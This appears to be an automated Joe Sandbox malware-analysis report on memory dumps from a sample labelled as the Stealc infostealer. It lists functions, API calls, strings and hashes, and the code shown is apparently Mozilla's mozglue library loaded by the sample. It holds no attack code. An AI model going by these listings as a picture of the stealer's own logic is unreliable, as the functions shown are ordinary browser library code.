[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6BAEFD15
[D %d/%d] profiler_unregister_thread: %s, xrefs: 6BAEFC94

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: dc7c603d20e551edec6cdadf1e8201eca411abc75f71946f11a0de807597ff66
Instruction ID: 1dcf24518daae080a611a92536c5713318896a964cd639b27583f43a45a5d2a8
Opcode Fuzzy Hash: dc7c603d20e551edec6cdadf1e8201eca411abc75f71946f11a0de807597ff66
Instruction Fuzzy Hash: 3C710071900740CFEB10DF28D545B7AB7E0FF85704F15496EE8198B351EB3AA882CBA2

Function 6BAA3AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BB2E768,?,00003000,00000004), ref: 6BAA3AC5
LeaveCriticalSection.KERNEL32(6BB2E768,?,00003000,00000004), ref: 6BAA3AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6BAA3AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BAA3B57
EnterCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3B81
LeaveCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3BA3
EnterCriticalSection.KERNEL32(6BB2E7B8), ref: 6BAA3BAE
LeaveCriticalSection.KERNEL32(6BB2E7B8), ref: 6BAA3C74
EnterCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3C8B
LeaveCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3C9F
LeaveCriticalSection.KERNEL32(6BB2E7B8), ref: 6BAA3D5C
EnterCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3D67
LeaveCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3D8A

Part of subcall function 6BAE0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6BAA3DEF), ref: 6BAE0D71
Part of subcall function 6BAE0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6BAA3DEF), ref: 6BAE0D84

Strings

: (malloc) Error in VirtualFree(), xrefs: 6BAA3DCC
<jemalloc>, xrefs: 6BAA3DC7
MOZ_CRASH(), xrefs: 6BAA3DB2

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: a4a7418eca1a246bcec42e44f1eafd80d14dac12dc5026e1815fc44bfae94a89
Instruction ID: 271b3663bf2bdd71331f73cf6ecb9580efcbdd33ca694d9f7ce6aed70f688734
Opcode Fuzzy Hash: a4a7418eca1a246bcec42e44f1eafd80d14dac12dc5026e1815fc44bfae94a89
Instruction Fuzzy Hash: 6191DF71A002048FDF24CF79C9C173E77F2FB86310B14456AE9559B295DB7AD880CBA1

Function 6BAB11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6BAB1213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BAB1285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6BAB12B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6BAB1327

Strings

Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6BAB120D
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6BAB131B
MZx, xrefs: 6BAB11E1
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6BAB12AD
&, xrefs: 6BAB126B

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: a0f5948fc7bb77bb5cea2e065a9b51978be0453ae1ca9631eae33a35032b541c
Instruction ID: 4b72e06447621551843c4f9692ffc7f2a59cc37870168bae852a763d358b4611
Opcode Fuzzy Hash: a0f5948fc7bb77bb5cea2e065a9b51978be0453ae1ca9631eae33a35032b541c
Instruction Fuzzy Hash: A7719E71E147648ADF249F74C9417BEB7F9BF45309F0406AAD455A3240EB386AC4CBA2

Function 6BAA31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6BAA3217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6BAA3236
FreeLibrary.KERNEL32 ref: 6BAA324B
__Init_thread_footer.LIBCMT ref: 6BAA3260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6BAA327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAA328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA32AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAA32D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BAA32E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6BAA32F7

Part of subcall function 6BADAB89: EnterCriticalSection.KERNEL32(6BB2E370,?,?,?,6BAA34DE,6BB2F6CC,?,?,?,?,?,?,?,6BAA3284), ref: 6BADAB94
Part of subcall function 6BADAB89: LeaveCriticalSection.KERNEL32(6BB2E370,?,6BAA34DE,6BB2F6CC,?,?,?,?,?,?,?,6BAA3284,?,?,6BAC56F6), ref: 6BADABD1

__aulldiv.LIBCMT ref: 6BAA346B

Strings

QueryInterruptTime, xrefs: 6BAA3230
KernelBase.dll, xrefs: 6BAA3212

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 0d19538a5725c4aba728f0343cdd8c43c581b4e81ad2fd0471c20adc03170351
Instruction ID: c8953e6f6502935aa083cd850893b0103f324dcb3dec05e961fa5653392ac040
Opcode Fuzzy Hash: 0d19538a5725c4aba728f0343cdd8c43c581b4e81ad2fd0471c20adc03170351
Instruction Fuzzy Hash: 7761E0719087418BCB21CF38C45262BB7E5FF86350F218B1EF9A6A3291EB35D585CB52

Function 6BAB3A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6BAB3BB4
ReleaseSRWLockShared.KERNEL32 ref: 6BAB3BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6BAB3BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6BAB3C91
ReleaseSRWLockShared.KERNEL32 ref: 6BAB3CBD
moz_xmalloc.MOZGLUE ref: 6BAB3CF1

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 9651acfe5e1202e2cecc84138f45e69bd9b296f32617e83f91425694805daaab
Instruction ID: b5f42ad280d684d27fbb6cb4e0cc002be5afa094bfbcf5600c3baf8c1204ea05
Opcode Fuzzy Hash: 9651acfe5e1202e2cecc84138f45e69bd9b296f32617e83f91425694805daaab
Instruction Fuzzy Hash: 56C15FB1904741CFCB24DF28C18466AFBF6BF89304F158A5ED8A98B315D735E885CB82

Function 6BAEEB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BAB4A68), ref: 6BAE945E
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BAE9470
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BAE9482
Part of subcall function 6BAE9420: __Init_thread_footer.LIBCMT ref: 6BAE949F

GetCurrentThreadId.KERNEL32 ref: 6BAEEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BAEEBAC

Part of subcall function 6BAE94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BAE94EE
Part of subcall function 6BAE94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BAE9508

GetCurrentThreadId.KERNEL32 ref: 6BAEEBC1
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8,?,?,00000000), ref: 6BAEEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BAEEBE5
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8,00000000), ref: 6BAEEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BAEEC46
CloseHandle.KERNEL32(?), ref: 6BAEEC55
free.MOZGLUE(00000000), ref: 6BAEEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BAEEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BAEEA9B

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: 7d05e869555d48ae08045d2482076bb471a8553513bdd8df405259b28d56f387
Instruction ID: 7403afdac92fa50d219295fa45b9307be4a10de40e869ff661343fe4738eea70
Opcode Fuzzy Hash: 7d05e869555d48ae08045d2482076bb471a8553513bdd8df405259b28d56f387
Instruction Fuzzy Hash: AC1103758006149FDF10AF74D849E7A7B69EF46368F044222FD2997240DB7AD882CBF2

Function 6BADF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BADD9DB), ref: 6BADF2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BADF2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BADF386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BADF347

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BADF3C8
free.MOZGLUE(00000000,00000000), ref: 6BADF3F3
free.MOZGLUE(00000000,00000000), ref: 6BADF3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6BADF413

Strings

ntdll.dll, xrefs: 6BADF2F0

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: 76ad9d0a6b3e457500f1645159b8a8efabf660ce8310f0b7e99733838a1278d0
Instruction ID: 294c8bb33c18446cf120e852f3ffd4d93e1abd67c9b485279fdfd9f9221c5cdc
Opcode Fuzzy Hash: 76ad9d0a6b3e457500f1645159b8a8efabf660ce8310f0b7e99733838a1278d0
Instruction Fuzzy Hash: B24104B5E002048BDF048F78D846BAFB7B5EF45314F15442ED92AA7380EB3AE585CB91

Function 6BB06A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6BB2F618), ref: 6BB06A68
GetCurrentProcess.KERNEL32 ref: 6BB06A7D
GetCurrentProcess.KERNEL32 ref: 6BB06AA1
EnterCriticalSection.KERNEL32(6BB2F618), ref: 6BB06AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BB06AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BB06B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6BB06B65
LeaveCriticalSection.KERNEL32(6BB2F618,?,?), ref: 6BB06B83

Strings

SymInitialize, xrefs: 6BB06BA3

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 3dc43da2c50256ee939b7b1c97ba5b695ffebce6f135216cc8eed9d1838628fd
Instruction ID: 3f6beaf3afa9954f7fb7aaab1e3e568a473801c124d8cdb625cd79004862992e
Opcode Fuzzy Hash: 3dc43da2c50256ee939b7b1c97ba5b695ffebce6f135216cc8eed9d1838628fd
Instruction Fuzzy Hash: 8C4192716043849FDB11DF74C889BBA3FA8EB46704F0445BAED498F282DB76D544CB62

Function 6BAEDBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BAB4A68), ref: 6BAE945E
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BAE9470
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BAE9482
Part of subcall function 6BAE9420: __Init_thread_footer.LIBCMT ref: 6BAE949F

GetCurrentThreadId.KERNEL32 ref: 6BAEDBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAEDBE9

Part of subcall function 6BAE94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BAE94EE
Part of subcall function 6BAE94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BAE9508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BAEDC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BAEDC7F

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

Part of subcall function 6BAE9A60: GetCurrentThreadId.KERNEL32 ref: 6BAE9A95
Part of subcall function 6BAE9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAE9A9D
Part of subcall function 6BAE9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BAE9ACC
Part of subcall function 6BAE9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAE9BA7
Part of subcall function 6BAE9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BAE9BB8
Part of subcall function 6BAE9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BAE9BC9

Part of subcall function 6BAEE8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BAEDCF5), ref: 6BAEE92D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAEDD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAEDD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAEDD58

Part of subcall function 6BADCBE8: GetCurrentProcess.KERNEL32(?,6BAA31A7), ref: 6BADCBF1
Part of subcall function 6BADCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BAA31A7), ref: 6BADCBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BAEDBF2

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 3378208378-1387374313
Opcode ID: 3118da2a0c2c771af84b6d2080c0da4be57fb3c2d9fd14a826e3465c6bdedf89
Instruction ID: f2e39e1a54350d72a29b0ebd5691a2ece489f5b4d868c7caed34c026784d6ecd
Opcode Fuzzy Hash: 3118da2a0c2c771af84b6d2080c0da4be57fb3c2d9fd14a826e3465c6bdedf89
Instruction Fuzzy Hash: A781C2746007008FCF24DF28C595A6AB7E5FF89308F54492DD8AA87741DB39E98ACB61

Function 6BAFAB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAFABB4
AcquireSRWLockExclusive.KERNEL32(6BAB4A63), ref: 6BAFABC0
ReleaseSRWLockExclusive.KERNEL32 ref: 6BAFAC06
GetCurrentThreadId.KERNEL32 ref: 6BAFAC16
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAFAC27
ReleaseSRWLockExclusive.KERNEL32 ref: 6BAFAC66
free.MOZGLUE(?), ref: 6BAFAD19
free.MOZGLUE(00000000), ref: 6BAFAD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6BAFAD38

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: c8a88f412244d91cdbf91d9545dd482d1b856f527815ac3b1039b218899481d5
Instruction ID: 900ec316ce5997edbde071f55cfcea074f61d67e78e2375ccbcf7b93d4ad4d05
Opcode Fuzzy Hash: c8a88f412244d91cdbf91d9545dd482d1b856f527815ac3b1039b218899481d5
Instruction Fuzzy Hash: 56513874600B058FCB24DF25C5987AAB7FABF89314F104A1DE8AA87750DB35F886CB51

Function 6BAFCB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCBE9
std::_Facet_Register.LIBCPMT ref: 6BAFCBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6BAFBCAE,?,?,6BAEDC2C), ref: 6BAFCC65

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 88c1c2b872aef41e7866109aa5fb0c72dcb27a30d8244a21ff109848714d346c
Instruction ID: 0196e2e7866dda981cff86ea17d4d938e121ca8b7d3f8ebd246ed46e3fc28c53
Opcode Fuzzy Hash: 88c1c2b872aef41e7866109aa5fb0c72dcb27a30d8244a21ff109848714d346c
Instruction Fuzzy Hash: BE41A434A002048FCF14DF65C999ABD77B9FF49354F484069E9099B351EB3AEC86CB91

Function 6BAABAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6BAABC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6BAABD06

Strings

0, xrefs: 6BAABC74
0, xrefs: 6BAABBCD
y, xrefs: 6BAABC4E

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
